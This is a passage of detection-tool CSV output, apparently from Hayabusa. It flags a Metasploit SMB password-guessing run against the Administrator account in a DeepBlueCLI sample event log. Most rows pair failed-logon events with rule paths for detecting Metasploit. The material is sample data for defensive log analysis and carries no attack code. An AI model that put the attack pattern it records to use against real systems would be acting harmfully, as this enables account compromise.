Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 